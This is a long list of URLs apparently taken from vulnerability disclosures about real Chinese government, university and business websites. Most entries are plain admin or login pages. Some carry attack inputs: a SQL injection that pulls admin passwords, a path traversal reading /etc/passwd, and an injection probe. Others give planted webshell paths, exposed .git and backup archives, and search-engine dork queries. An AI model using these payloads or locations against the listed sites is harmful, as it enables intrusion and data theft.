http://card.cup.edu.cn/sydxPortalHome.action http://menhu.cup.edu.cn/sso/consSite/consSite.html http://oa.cup.edu.cn/seeyon/login/sso?from=sydxOneWebSit http://webservice.cup.edu.cn/network/query/LoginCheck2.aspx http://menhu.cup.edu.cn/puservice/task.s?action=saveUserInfo&userId= http://www.chinacer.com/showDepDirInfos.jsp?depcode=BR0000 http://gk.tjjh.gov.cn/showDepDirInfos.jsp?depcode=BR0000 http://zwgk.tjhd.gov.cn:8000/showDepDirInfos.jsp?depcode=BB0000 http://xinxigk.baodi.gov.cn/showDepDirInfos.jsp?depcode=BNA16G http://218.69.106.201:8080/showDepDirInfos.jsp?depcode=BCA09C http://xxgk.tjbc.cn/showDepDirInfos1.jsp?levelCode=0101&depcode=BLA01A http://www.tjzfxxgk.gov.cn/tjep/XWFBInfordetail.jsp?id=96 http://gk.tjjh.gov.cn/XWFBInfordetail.jsp?id=30 shell:http://rcgzb.hbu.edu.cn/upfile/talentsImg/tq.asp;.jpg http://cg.mycgw.com/common/login.action http://cg.mycgw.com/wooyun.jsp http://gtms02.alicdn.com/tps/i2/TB1fW2PGVXXXXX1XpXXUAkPJpXX-90-90.png http://zxxx.zjwchc.com:8080/zxxx/index.action http://wiki.pigai.org/ http://211.155.226.20:8080/socket5_davinci;chmod http://youqian.baidu.com/user/appeal/appeal_info?active=appeal_list&appeal_id=EC1178188d http://pianke.me/message/history/711309 http://www.loca.hk/enproduct.php?id=13 http://www.loca.hk/admin/adminindex.php http://www.lxzjc.gov.cn/jubao/ruleshow.asp?id=1 http://www.qjetc.gov.cn:88/sfwt/visitshow.asp?id=12 http://www.czdxyq.cn/jzxx/visitshow.asp?id=21 http://www.dfcms.net/ http://www.jkedu.net.cn:8080/webStationStats/webStationStats.do?method=stats&saasAppId=bdb5639f-c8ad-4b98-92fb-80cba5c7f567&webStationId=www_jkedu_net_cn http://www.dantu.gov.cn/webStationStats/webStationStats.do?method=stats&saasAppId=49aac47a-f659-42aa-ac57- http://www.jre.net.cn/webStationStats/webStationStats.do?method=stats&saasAppId=f463e6d9-c0c7-47a2-841d- http://www.dfcms.net:8080/webStationStats/webStationStats.do?method=stats&saasAppId=7defe4ae-dfb0-4901-87b7- 
http://rztsg.com/webStationStats/webStationStats.do?method=stats&saasAppId=e8aec4c4-064d-4b4c-af9d-a6018a2cf035&webStationId=www_rztsg_com http://www.zslxx.cn/webStationStats/webStationStats.do?method=stats&saasAppId=a42bb76e-afff-4bba-ad3c- http://218.3.133.26/webStationStats/webStationStats.do?method=stats&saasAppId=8fd048c0-473c-410b-9641- http://222.186.119.241/webStationStats/webStationStats.do?method=stats&saasAppId=1044b6f7-8a6a-4f9b-9d88-74c59c9c691f&webStationId=www_dantu_gov_cn http://www.jszjsx.com/webStationStats/webStationStats.do?method=stats&saasAppId=d30101e0-22a1-4c3e-9f57- http://www.dantu.gov.cn/webStationStats/webStationStats.do?method=stats&saasAppId=49aac47a-f659-42aa-ac57-b9510e0aef5c&webStationId=hrss_dantu_gov_cn http://ichuguo.chinadaily.com.cn/search?query=%E8%BF%AA%E6%8B%9C&area=100 http://mtodo.wanda.cn/ServiceMobile.asmx?op=GetAllCount http://gxxmsb.cq.gov.cn/Admin/index.php/Public/view/id/8 http://admin.96020228.cn/ intitle:ZDSOFT.NET信息发布平台 http://www.kingosoft.com/cgal/mxyh.aspx http://stu.gxufe.cn/xsweb/pub/Yx_Zy_Bj.aspx?yx=wooyun http://stu.gxufe.cn/xsweb/pub/Yx_Zy_Bj.aspx?yx=wooyun http://szxy.cqsxedu.com/xsweb/_data/NEWS.aspx?href=633409086902360000.xml http://stu.gxufe.cn/xsweb/pub/Yx_Zy_Bj.aspx?yx=wooyun http://221.215.217.106/xsweb/pub/Yx_Zy_Bj.aspx?yx=wooyun http://xsgl.qjnu.edu.cn/xsweb/pub/Yx_Zy_Bj.aspx?yx=wooyun http://1.85.45.94:800/xsweb/pub/Yx_Zy_Bj.aspx?yx=wooyun http://szxy.cqsxedu.com/xsweb/pub/Yx_Zy_Bj.aspx?yx=wooyun inurl:5clib/?.action http://jyjdc.pdsedu.gov.cn:9914/ http://www.baidu.com/s?wd=科发网上查询系统&ie=utf-8 http://cn.bing.com/search?q=科发网上查询系统&ie=utf-8 http://gzcx.tynu.edu.cn/kfweb/xyhzc.aspx http://221.5.51.228/cjb/xyhzc.aspx http://210.45.92.21/xyhzc.aspx http://www.shcdkf.com/kfweb/xyhzc.aspx http://cwc.sxufe.edu.cn/KfWeb/xyhzc.aspx http://www.cqvie.com/xfcxsq/xyhzc.aspx http://59.72.128.44/KfWeb/xyhzc.aspx http://gjgl.ahaas.cn/gjgl.aspx http://www.sklse.whu.edu.cn/index.php/admin/login 
biz.atsmart.com/biz/biz/login.action http://**.**.**/biz/wooyun.jsp http://**.**.**/Zdjdc_hlw/login.action http://**.**.**/Zdjdc_hlw/k8cmd.jsp http://training.fang.com//course/Course.aspx?action=search http://www.bank-of-tianjin.com.cn/websiteview/mapBranch/mapbranchlistCount.json http://www.bank-of-tianjin.com.cn/websiteview/mapBranch/mapbranchlistCount.json http://218.25.36.44:6789/cyry/login.action http://121.40.134.14/general/person_info/concern_user/update.php http://121.40.134.14 http://www.dca.org.cn/certification_anpai?fenlei=%E5%B7%A5%E4%BD%9C%E7%BB%84%E5%92%8C%E7%A0%94%E7%A9%B6&fid=227&id=183&wid=367%20union%20select%201,pwd,3,username,5,6,7,8,9,10,11,12%20from%20admin# http://www.dca.org.cn/admin http://www.dca.org.cn/search?like=1 http://**.**.**/platform/index.php/MainAction-getAdInfoByChannelIdchannelid=109&length=1&_=1418281553802 http://passport.comicyu.com/uploads/avatar_ori_170519_1418359830.gif/.php http://reg.kingdee.com/getpass.asp http://www.cnoocairproducts.com/list.asp?id=191 http://www.hihcar.com/Join/Handler.ashx?type=Shg&id=110000 http://studytv.cctv.com/activity/list?KeyWord=1% http://agent.pfp.sina.com.cn/login.html http://202.99.45.107:8080/login.action http://go.ly.com http://219.148.35.11 www.licaike.com http://img.dai.licaike.com/ http://servicehome.ufida.com.cn/kmview.aspx?postid=16503 http://www.bjunesco.gov.cn/ http://iche.zju.edu.cn/ckfinder/ckfinder.html http://120.197.95.200:9090/index.jsp http://www.apta.gov.cn:10080/informationContent.asp?news_id=123&type=F_News_RecentActivity http://www.letvcloud.com/api/docdownload/?filename=../../../../../../../../../../../etc/passwd http://**.**.**/index.aspx http://www.letvcloud.com/www.tar.gz http://www.smg.cn/ann/content.php?id=630 http://edm.feng.com/ http://edm.feng.com/aaa.txt file:TailList.sys http://www.blogjava.net/ebecket/articles/301493.html https://121.207.242.49/login http://www.cxdrc.com/person/viewmail.asp?id=14018 http://job0514.com/person/viewmail.asp?id=3338 
http://www.dlcxdrc.com/person/viewmail.asp?id=14018 http://www.qzjyrczx.com/person/viewmail.asp?id=379 http://www.lnbprsrc.com/person/viewmail.asp?id=15585 http://zone.it.sohu.com/admin/ http://zone.it.sohu.com/admin.php http://club.sohu.com/fckeditor/ http://club.sohu.com/fckeditor/editor/filemanager/upload/php/upload.php http://club.sohu.com/userfiles/Media/fuck.pHp http://astro.women.sohu.com/server-status/ https://fuwu.alipay.com/platform/material.htm https://tfsimg.alipay.com/images/partner/T1PuXeXniLXXbMsGbX.html url:http://sxxwwybm.tyut.edu.cn/news.action http://feedback.uc.cn/feedback/feedback/feedbackdetail?instance=ClientiPad&Id=15386&rver=$rver&uc_param_str=einibicppfmivesifrutlasv http://feedback.uc.cn/feedback/feedback/deletefeedback?instance=ClientiPad&id=15381&rver=$rver&uid=43246025&uc_param_str=einibicppfmivesifrutlasv http://117.79.131.43:8080/ inurl:way/show.asp?id= http://www.ocanadatravel.com/way/show.asp?id=141 http://www.gdyy-travel.com/way/show.asp?id=125 http://www.wo-long-gang.com/way/show.asp?id=2 http://www.nanjingdongdu.com/way/show.asp?id=97 http://www.hs128.com/hs128/way/show.asp?id=44 http://www.zgszkh.com/way/show.asp?id=2392 http://www.83108310.com/way/show.asp?id=290 http://www.xz66.cn/way/show.asp?id=377 http://minibustour.cn/way/show.asp?id=115 http://www.youlv.com/way/show.asp?id=95 http://www.ocanadatravel.com/way/show.asp?id=141 http://www.gdyy-travel.com/way/show.asp?id=125 http://www.wo-long-gang.com/way/show.asp?id=2 http://localhost/blog/admin/store.php?action=insplu&source=/plugin/download/188 http://www.kingosoft.com/cgal/mxyh.aspx http://stu.gxufe.cn/xsweb/pub/temp.aspx?type=menu&nj=wooyun http://stu.gxufe.cn/xsweb/pub/temp.aspx?type=menu&nj=wooyun http://stu.gxufe.cn/xsweb/pub/temp.aspx?type=menu&nj=wooyun http://221.215.217.106/xsweb/pub/temp.aspx?type=menu&nj=wooyun http://xsgl.qjnu.edu.cn/xsweb/pub/temp.aspx?type=menu&nj=wooyun http://1.85.45.94:800/xsweb/pub/temp.aspx?type=menu&nj=wooyun 
http://szxy.cqsxedu.com/xsweb/pub/temp.aspx?type=menu&nj=wooyun http://175.19.208.78/query/PersonalBaseInfo!Login.jspx http://ltssfl.com/LTDefault.aspx http://www.x-lab.tsinghua.edu.cn/index.php?c=activity&a=top&e=hdjs&id=115+AND+1=1 http://125.64.220.176/test.txt http://125.64.220.176/eis/index.action inurl:ecdomain http://my.henau.edu.cn/userAttributesView.portal?userId=XX来判断该账号是否合法) http://xg.henau.edu.cn/epstar/login/index.jsp http://xg.henau.edu.cn/epstar/web/apps/reportJsp/showReport.jsp?raq=SWMS/JBXXXQ.raq&WID=XXXX http://my.henau.edu.cn/index.portal http://my.henau.edu.cn/authorizeUsers.portal?limit=20 http://xg.henau.edu.cn/epstar/web/apps/reportJsp/showReport.jsp?raq=SWMS/JBXXXQ.raq&WID=XXX http://u9service.yonyou.com/servicehome/kmview.aspx?postid=ZS20100530204 http://sqlmap.org http://academy.yonyou.com/ViewZsMap.aspx?der=zproducts&name=N http://dingdean.vicp.net:81/%E4%BA%A7%E5%93%81%E8%B5%84%E6%96%99/ http://careers.microsoft.com/web.zip http://223.202.5.5/ http://graschool.bjmu.edu.cn/EmploymentWeb/zxdt.aspx?id=982 http://www.bzcin.gov.cn/ClassInfo.asp?PrdID=12&ClassID=175&ClassName=%E8%A1%8C http://www.bzcin.gov.cn/ScanWebshell.asp http://223.202.1.75:8080/www.dyk-club.com.cn.zip http://223.202.1.75:8080/dealers-ad.dyk.com.cn.zip http://223.202.1.75:8080/Dealers-Reg.Dyk.Com.Cn.zip ftp://www.zyyzgl.cn/ http://**.**.**/qghk_content.aspID=13 http://e.kesion.com/exam/Reviews.aspx?id=20http://e.kesion.com/ http://e.kesion.com/exam/Reviews.aspx?id=20 http://e.kesion.com/exam/Reviews.aspx?id=16 http://e.kesion.com/exam/Reviews.aspx?id=19 http://www.et315.com/Default.aspx http://15.qq.com/ http://15.qq.com/.git/config ssh://wangpeng@115.159.72.104:13345/mydata/gitserver/15qq http://www.wayboo.cn/ http://hszyzc.com/subweb.php?class=96 http://www.xayichi.com/subweb.php?class=37 http://www.dfhlgl.com/subweb.php?class=18 http://www.shfuhai.com/subweb.php?class=26 http://www.hqdsvf.com/subweb.php?class=79 http://www.xayfds.net/subweb.php?class=64 
http://www.bjyalian.net/subweb.php?class=14 http://www.bjznxf.com/subweb.php?class=6 http://www.xawhmc.com/subweb.php?class=40 http://www.pbdt360.com/subweb.php?class=13 http://www.sxtongtu.com/subweb.php?class=31 http://www.bdjyjx.com/subweb.php?class=36 http://www.jndsmm.com/subweb.php?class=22 http://www.qiqiangjx.com/subweb.php?class=5 http://www.lhzpl.com/subweb.php?class=59 http://www.sjzbangongjiaju.com/subweb.php?class=36 http://www.月子病.net/subweb.php?class=31 http://www.fangshuilaoguo.com/subweb.php?class=25 http://www.hszs555.com/subweb.php?class=25 http://www.hbdxps.com//subweb.php?class=25 http://www.caciquemill.net/subweb.php?class=25 http://www.caciquemill.net/subweb.php?class=25 http://www.hbdxps.com//subweb.php?class=25 http://investor.skyworth.com/html/ir_circular.php?year=2014 http://www.rcwl.net/ http://rcwl.net/demo/News/Message/?typeId=mess04 http://www.wxlxas.com/News/Message/?typeId=mess04 http://www.stxx.fxedu.cn/News/Message/?typeId=mess04 http://www.cqjjzx.com/webschool/News/Message/?typeId=mess04 http://www.cqxjwxx.com.cn/webschool/News/Message/?typeId=mess04 http://mhzx.mhedu.sh.cn/mhzx/News/Message/?typeId=mess04 http://www.jycsyey.net/webschool/News/Message/?typeId=mess03 http://www.czxqxx.cn/webschool/News/Message/?typeId=mess01 http://223.4.203.193/cqjyxh/News/Message/?typeId=mess02 http://222.191.250.164/webschool/News/Message/?typeId=mess02 http://czcjxx.com.cn/webschool/News/Message/?typeId=mess01 http://czcjxx.com.cn/webschool/News/Message/?typeId=mess01 http://www.wayboo.cn/ http://www.jndsmm.com/news_list.php?class=2 http://www.pbdt360.com/news_list.php?class=2 http://chengxinbaipisong.com/news_list.php?class=2 http://www.xawhmc.com/news_list.php?class=41 http://www.hqdsvf.com/news_list.php?class=2 http://sjzbangongjiaju.com/news_list.php?class=2 http://www.lhzpl.com/news_list.php?class=2 http://www.jljddb.com/news_list.php?class=2 http://www.bhpfjkjy.com/news_list.php?class=37 http://www.365scl.com/news_list.php?class=31 
http://hrgg88.com/news_list.php?class=2 http://www.bszyjc.net/news_list.php?class=2 http://www.sxtongtu.com/news_list.php?class=41 http://www.lilongeps.cn/news_list.php?class=2 http://www.诚田暖气.com/news_list.php?class=58 http://w308810.s70-187.myverydz.com/news_list.php?class=2 http://www.fangshuilaoguo.com/news_list.php?class=2 http://www.xyxf119.com/news_list.php?class=2 http://www.xaqiegeji.com/news_list.php?class=41 http://bdjunlong.com/news_list.php?class=2 http://www.huashidaijiaoyu.com/news_list.php?class=118 http://www.huashidaijiaoyu.com/news_list.php?class=118 http://bdjunlong.com/news_list.php?class=2 http://www.wayboo.cn/ http://www.xayfds.net/pics_list.php?class=47 http://www.xayichi.com/pics_list.php?class=3 http://www.shfuhai.com/pics_list.php?class=39 http://www.xawhmc.com/pics_list.php?class=55 http://www.jndsmm.com/pics_list.php?class=36 http://www.pbdt360.com/pics_list.php?class=71 http://www.xakqby.com/pics_list.php?class=43 http://www.bdjyjx.com/pics_list.php?class=3 http://www.xakqby.com/pics_list.php?class=36 http://www.bjznxf.com/pics_list.php?class=41 http://www.lhzpl.com/pics_list.php?class=34 http://www.sxtongtu.com/pics_list.php?class=39 http://www.tianchuanfood.com/pics_list.php?class=68 http://sjzbangongjiaju.com/pics_list.php?class=36 http://www.chengtiannuanqi.com/pics_list.php?class=3 http://www.qiqiangjx.com/pics_list.php?class=3 http://chengxinbaipisong.com/pics_list.php?class=36 http://www.bhpfjkjy.com/pics_list.php?class=3 http://hrgg88.com/pics_list.php?class=3 http://www.365scl.com/pics_list.php?class=71 http://chengkai888.com/pics_list.php?class=65 http://www.zzpjjg.com/pics_list.php?class=49 http://qcsiwang.com/pics_list.php?class=4 http://bdjunlong.com/pics_list.php?class=3 http://www.jljddb.com/pics_list.php?class=4 http://www.bjyalian.net/pics_list.php?class=3 http://www.bszyjc.net/pics_list.php?class=4 http://www.bdbaihuajiaoyu.com/pics_list.php?class=69 http://www.xaqiegeji.com/pics_list.php?class=39 
http://www.caciquemill.net/pics_list.php?class=3 http://www.hbdxps.com/pics_list.php?class=4 http://www.hszs555.com/pics_list.php?class=43 http://www.fangshuilaoguo.com/pics_list.php?class=64 http://www.fangshuilaoguo.com/pics_list.php?class=64 http://www.hszs555.com/pics_list.php?class=43 http://mp.toutiao.com/login/ http://mp.toutiao.com/activate_user_email_action/?email_id=3732817410&ticket=TNHKT1 http://118.186.207.58/login.php http://m.wanhui.cn/ktv/ktvdetail/?cid=e7dd34fe-84c2-4813-a334-38cc0c5663ef http://p3p.sogou.com/upgrademanual.php?h=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&v=5.1.7.15323&r=0000 http://www4.zzu.edu.cn/webnet/xuan/list.aspx?bt=aggqdjc http://www.wmw.cn/ http://passport.wmw.cn/passport/newloginiframe.action http://apps.zsepb.gov.cn/zsapt/login.action http://adp.whoclick.cn/ADPush/pushfacade!amdsr.action?callback=haiqipopMySucc&amdsrdata={%22requesttype%22:%22AMDSR%22,%22publisherid%22:%2234110%22,%22screenwidth%22:%221920%22,%22screenheight%22:%221080%22,%22ip%22:%22119.57.154.74%22,%22keyword%22:%22%22,%22sourceurl%22:%22%22,%22targeturl%22:%22http%3A%2F%2Fwww.timeyb.com%2F%22}?1418178180012 http://pic.gmw.cn/ http://www.t1networks.com/web.rar http://sh.live800.com/admin/top.aspx http://lib.zzu.edu.cn/say.aspx?sid=493b9edc-3388-4baf-a5c1-d42e6fdf7462 http://rsks.gov.cn/ http://www.westfood.com.cn/zpqz/printqzinfo.action http://www.westfood.com.cn/1.jsp http://114.255.121.12:8001/app/user/login.php http://live.findlaw.cn/iframe/flink.php?luanmu=falvchangshi&channel=64 http://live.findlaw.cn/iframe/ht_flink.php?fid=69 http://china.findlaw.cn/product/index.php?m=Zhishi&a=zt_ajax&catid=7852 http://china.findlaw.cn/aboutus/tougao.php http://60.28.205.38:8080/ur/reflect/userReflectCheckNew.jsp http://60.28.205.38:8080/ur/reflect/userReflectCheckNew.jsp http://60.28.205.38:8080/ur/reflect/userReflectCheckNew.jsp http://cwc.sxufe.edu.cn/KfWeb/admin/StudentPassword.aspx http://www.shcdkf.com/kfweb/admin/StudentPassword.aspx 
http://221.5.51.228/cjb/admin/StudentPassword.aspx http://61.142.174.200/cwc/KFweb/admin/StudentPassword.aspx http://cwch.ahu.edu.cn/querynetweb/admin/StudentPassword.aspx http://www.cqvie.com/xfcxsq/admin/StudentPassword.aspx http://59.72.128.44/KfWeb/admin/StudentPassword.aspx http://cwch.ahu.edu.cn/querynetweb/admin/StudentPassword.aspx http://cycwc.gzife.edu.cn/kefa/admin/StudentPassword.aspx http://www.liangjing.org/qiyejianzhan/Ch/ProductClass-2.html inurl:Chinese/ProductShow.asp?ArticleID= http://www.shzxyy.com/chinese/FaqInfo.asp?ID=76 http://www.joinluck.com/Chinese/FaqInfo.asp?id=74 http://www.z-hope.com/Chinese/FaqInfo.asp?id=76 http://www.wmt.com.cn/chinese/FaqInfo.asp?id=76 http://www.autochair.cn/au/Chinese/FaqInfo.asp?id=76 http://www.fjjyarts.com/chinese/FaqInfo.asp?id=86 http://guard.net.cn/cn/index/FaqInfo.asp?id=268 http://www.fishmedicine.com.cn/Chinese/FaqInfo.asp?id=89 http://www.newcam-olym.com/Chinese/FaqInfo.asp?id=106 http://www.cdsysoft.cn/Chinese/FaqInfo.asp?id=3 http://www.wuzhouyiyao.com/Chinese/FaqInfo.asp?id=2 http://www.zhonglifurniture.com/Chinese/FaqInfo.asp?id=76 http://www.lrdyf.com/chinese/FaqInfo.asp?id=73 http://www.kchzhz.com/chinese/FaqInfo.asp?id=76 http://www.99smsoft.com/Chinese/FaqInfo.asp?id=2 http://www.xxctmy.com/chinese/FaqInfo.asp?id=88 http://www.zh-rx.com/zhrx/Chinese/FaqInfo.asp?id=73 http://www.xinjihai.com/Chinese/FaqInfo.asp?id=81 http://www.hngfz.com/Chinese/FaqInfo.asp?id=78 http://www.zqtm.cn/service/faqInfo.asp?id=4 http://www.ennanna.com/chinese/FaqInfo.asp?id=80 http://www.jllgs.com/chinese/FaqInfo.asp?id=76 http://www.sh-q.com.cn/Chinese/FaqInfo.asp?id=73 http://www.jmjjgc.com/chinese/FaqInfo.asp?id=89 http://www.scxoy.com/Chinese/FaqInfo.asp?id=73 http://www.cscl.cn/Chinese/FaqInfo.asp?id=73 http://www.pinganxiaofang.cn/Chinese/FaqInfo.asp?id=15 http://www.lopo.com.cn/chinese/FaqInfo.asp?id=74 http://www.leige.com.cn/English/En_ProductShow.asp?ArticleID=601 
http://www.zhongjinalu.com/English/En_ProductShow.asp?ArticleID=314 http://www.yike.com.cn/English/en_ProductShow.asp?ArticleID=878 http://www.cuiquan.com/English/En_ProductShow.asp?ArticleID=180 http://www.joinluck.com//English/En_ProductShow.asp?ArticleID=149 http://www.hengtongchemical.com/english/En_ProductShow.asp?ArticleID=11 http://www.fumingwei.com/English/En_ProductShow.asp?ArticleID=24 http://www.watsin.com.cn/English/En_ProductShow.asp?ArticleID=169 http://www.yunntong.com/english/En_ProductShow.asp?ArticleID=25 http://www.taishantyre.com/English/En_ProductShow.asp?ArticleID=132 http://www.mme.com.cn/English/En_ProductShow.asp?ArticleID=287 http://www.totemamusement.com/English/En_ProductShow.asp?ArticleID=432 http://www.z-hope.com/English/En_ProductShow.asp?ArticleID=152 http://www.wishfuloptical.com/English/En_ProductShow.asp?ArticleID=219 http://www.jingliangroup.com/english/En_ProductShow.asp?ArticleID=138 http://www.pandaintl.com.cn/en/En_ProductShow.asp?ArticleID=579 http://www.medicn.cn/english/En_ProductShow.asp?ArticleID=281 http://www.hanbo.cc/udisk/english/En_ProductShow.asp?ArticleID=1140 http://www.zhihefrp.com/English/En_ProductShow.asp?ArticleID=143 http://www.scrfast.com/English/En_ProductShow.asp?ArticleID=319 http://www.ldfibre.cn/English/En_ProductShow.asp?ArticleID=171 http://www.binzim.net/English/En_ProductShow.asp?ArticleID=607 http://www.kalifon.com/en/En_ProductShow.asp?ArticleID=140 http://www.zhmachinery.com/En/En_ProductShow.asp?ArticleID=174 http://www.zhongjinalu.com/English/En_Product.asp?EnBigClassName=Smoke%20foil http://www.yike.com.cn/English/En_Product.asp?EnBigClassName=Stand%20Series http://www.joinluck.com//English/En_Product.asp?EnBigClassName=LED-Based%20Products http://www.hengtongchemical.com/english/En_Product.asp?EnBigClassName=hg http://www.yunntong.com/english/En_Product.asp?EnBigClassName=Anti-decubitus\Pump http://www.watsin.com.cn/English/En_Product.asp?EnBigClassName=GeneTime 
http://www.fumingwei.com/English/En_Product.asp?EnBigClassName=For%20Medical http://www.taishantyre.com/English/En_Product.asp?EnBigClassName=CAR%20TYRE%20SERIES http://www.mme.com.cn/English/En_Product.asp?EnBigClassName=mobile%20series http://www.totemamusement.com/English/En_Product.asp?EnBigClassName=PRODUCTS http://www.z-hope.com/English/En_Product.asp?EnBigClassName=cable%20recovery%20equipment http://www.wishfuloptical.com/English/En_Product.asp?EnBigClassName=CR39%20Resin%20Lens http://www.jingliangroup.com/english/En_Product.asp?EnBigClassName=Lens%20edger http://www.pandaintl.com.cn/en/En_Product.asp?EnBigClassName=LCD%20Panel http://www.medicn.cn/English/En_Product.asp?EnBigClassName=Intermediates/Chemicals http://www.hanbo.cc/udisk/english/En_Product.asp?EnBigClassName=USB%20FLASH%20DRIVES http://www.zhihefrp.com/English/En_Product.asp?EnBigClassName=National%20defense http://www.scrfast.com/English/En_Product.asp?EnBigClassName=WASHERS http://www.binzim.net/English/En_Product.asp?BigClassName=Ultrasonic%20Beauty%20Instrument http://www.kalifon.com/en/En_Product.asp?EnBigClassName=New%20products http://www.zhmachinery.com/En/En_Product.asp?EnBigClassName=Laundry%20Soap%20Machine http://www.lxjx.cn/ajax.php?act=cate&id=1 http://www.liangjing.org/qiyejianzhan/Ch/ProductClass-2.html inurl:Chinese/ProductShow.asp?ArticleID= http://admin.asp99.cn/2008/Chinese/index.asp由于有WAF所以不能直接工具注入,我就不用demo演示了 http://www.leige.com.cn/Chinese/ProductShow.asp?ArticleID=601 http://218.4.48.253/Chinese/ProductShow.asp?ArticleID=192 http://www.ccm-hardware.com/chinese/ProductShow.asp?ArticleID=159 http://www.yike.com.cn/chinese/ProductShow.asp?ArticleID=878 http://www.hengtongchemical.com/chinese/ProductShow.asp?ArticleID=12 http://www.ssllt.com/llt/Chinese/ProductShow.asp?ArticleID=190 http://www.jllgs.com/chinese/ProductShow.asp?ArticleID=188 http://www.joinluck.com/Chinese/ProductShow.asp?ArticleID=151 http://www.jsdydj.cn/Chinese/ProductShow.asp?ArticleID=173 
http://www.sh-q.com.cn/Chinese/ProductShow.asp?ArticleID=193 http://www.ruidongyb.com/Chinese/ProductShow.asp?ArticleID=138 http://www.99smsoft.com/Chinese/ProductShow.asp?ArticleID=176 http://www.wmt.com.cn/chinese/ProductShow.asp?ArticleID=274 http://www.mhtsoft.com/Chinese/ProductShow.asp?ArticleID=204 http://www.wuzhouyiyao.com/Chinese/ProductShow.asp?ArticleID=188 http://www.csf.net.cn/2008/chinese/ProductShow.asp?ArticleID=223 http://www.cdsysoft.cn/Chinese/ProductShow.asp?ArticleID=175 http://www.high-hot.cn/Chinese/ProductShow.asp?ArticleID=158 http://www.bjztxy.com/Chinese/ProductShow.asp?ArticleID=144 http://www.tzymjx.com/chinese/ProductShow.asp?ArticleID=255 http://www.pabx.cn/chinese/ProductShow.asp?ArticleID=165 http://jsxf.com.cn/Chinese/ProductShow.asp?ArticleID=196 http://www.tgbjs.com/Chinese/ProductShow.asp?ArticleID=140 http://www.zhmachinery.com/Chinese/ProductShow.asp?ArticleID=178 http://www.goldcode.cn/chinese/ProductShow.asp?ArticleID=370 http://www.ccm-hardware.com/chinese/Product.asp?BigClassName=%B9%A4%BE%DF%BF%DB http://www.leige.com.cn/Chinese/Product.asp?BigClassName=%B8%F4%D2%F4%B2%C4%C1%CF http://www.yike.com.cn/chinese/Product.asp?BigClassName=%D6%A7%BC%DC%CF%B5%C1%D0 http://www.hengtongchemical.com/chinese/Product.asp?BigClassName=%BB%AF%B9%A4%B2%FA%C6%B7 http://www.jllgs.com/chinese/Product.asp?BigClassName=%B8%D6%CB%BF%C9%FE%CF%B5%C1%D0 http://www.joinluck.com/Chinese/Product.asp?BigClassName=LED%D3%A6%D3%C3%B2%FA%C6%B7 http://www.jsdydj.cn/Chinese/Product.asp?BigClassName=%D6%B1%C1%F7%B5%E7%BB%FA http://www.ssllt.com/llt/Chinese/Product.asp?BigClassName=%C6%FB%B3%B5%D3%B0%D2%F4%D3%C3%C6%B7 http://www.sh-q.com.cn/Chinese/Product.asp?BigClassName=CAD%20%BC%C6%CB%E3%BB%FA%B8%A8%D6%FA%C9%E8%BC%C6 http://www.ruidongyb.com/Chinese/Product.asp?BigClassName=%D1%B9%C1%A6%B1%ED%BB%FA%D0%BE http://www.99smsoft.com/Chinese/Product.asp?BigClassName=%D7%DB%BA%CF%C8%ED%BC%FE%CF%B5%C1%D0 
http://www.wmt.com.cn/chinese/Product.asp?BigClassName=%B8%DC%B8%CB%D6%B8%CA%BE%B1%ED http://www.wuzhouyiyao.com/Chinese/Product.asp?BigClassName=%C8%AB%B9%FA%D5%D0%C9%CC%C6%B7%D6%D6 http://www.mhtsoft.com/Chinese/Product.asp?BigClassName=%D0%DD%CF%D0/%B2%CD%D2%FB http://www.csf.net.cn/2008/chinese/Product.asp?BigClassName=%CA%E0%D6%E1 http://www.cdsysoft.cn/Chinese/Product.asp?BigClassName=%B0%F1%C9%CF%CB%E3%C3%FC%CF%B5%C1%D0 http://www.bjztxy.com/Chinese/Product.asp?BigClassName=%B9%AB%CB%BE%B2%FA%C6%B7 http://www.tzymjx.com/chinese/Product.asp?BigClassName=%C8%AB%D7%D4%B6%AF%B4%B5%C6%BF%BB%FA http://www.pabx.cn/chinese/Product.asp?BigClassName=%B3%CC%BF%D8%B5%E7%BB%B0%BD%BB%BB%BB%BB%FA http://jsxf.com.cn/Chinese/Product.asp?BigClassName=%B9%AB%C2%B7%B9%A4%B3%CC http://www.zhmachinery.com/Chinese/Product.asp?BigClassName=%CF%E3%D4%ED%C9%FA%B2%FA%C9%E8%B1%B8 http://www.goldcode.cn/chinese/Product.asp?BigClassName=%B5%E7%B6%AF%B3%B5%B5%A5%CF%F2%B7%C0%B5%C1%C6%F7 http://www.leige.com.cn/Chinese/NewsInfo.asp?Action=Co&id=126 http://www.zhongjinalu.com/chinese/NewsInfo.asp?Action=Co&id=95 http://www.yike.com.cn/chinese/NewsInfo.asp?Action=Co&id=107 http://www.get-extrusion.com/chinese/NewsInfo.asp?Action=Co&id=148 http://www.cuiquan.com/chinese/NewsInfo.asp?Action=Co&id=20 http://www.joinluck.com/Chinese/NewsInfo.asp?Action=Co&ID=105 http://www.toshiba-gtbs.com/Chinese/NewsInfo.asp?Action=Co&id=85 http://www.powerteck.com.cn/Chinese/NewsInfo.asp?Action=Co&id=102 http://yj183.com/mgjx/chinese/NewsInfo.asp?Action=Co&id=89 http://www.shzxyy.com/chinese/NewsInfo.asp?Action=Co&ID=129 http://www.chang-de.com/CN/NewsInfo.asp?Action=Co&id=117 http://www.zjxcxj.com/Chinese/NewsInfo.asp?Action=Co&id=95 http://www.hengtongchemical.com/chinese/NewsInfo.asp?Action=Co&id=674 http://www.simyi.com/chinese/newsinfo.asp?action=Co&id=134 http://www.cn-yule.com/chinese/NewsInfo.asp?Action=Co&id=100 http://www.tang-ju.com/chinese/NewsInfo.asp?Action=Co&id=96 
http://www.z-hope.com/Chinese/NewsInfo.asp?Action=Co&ID=89 http://www.goldcode.cn/chinese/NewsInfo.asp?Action=Co&id=107 http://www.zhmachinery.com/Chinese/NewsInfo.asp?Action=Co&ID=145 http://www.greating-fortune.com/cn/NewsInfo.asp?Action=Co&id=83 http://www.tgbjs.com/Chinese/NewsInfo.asp?Action=Co&ID=91 http://cnxiongfeng.com/cn/NewsInfo.asp?Action=Co&ID=103 http://finance.qq.com/silver/ http://agent.telchina.org/login.action ftp://box.caiyun.com ftp://biansu.caiyun.com http://dag.cjlu.edu.cn/list_first.php?I=40&B=2&NI=464 http://jwc.cjlu.edu.cn:8080/phpinfo.php http://interlib.com.cn http://interlib.com.cn/tcsoft/web/information.do?actionCmd=view&id=213 http://interlib.com.cn http://interlib.com.cn/tcsoft/web/information.do?actionCmd=view&id=213 http://u.mumayi.com/oauth/?m=Oauth&a=authorize&client_id=100003&redirect_uri=http%3A%2F%2Fhao.mumayi.cn%2FHomelogin%2FCallback&response_type=code 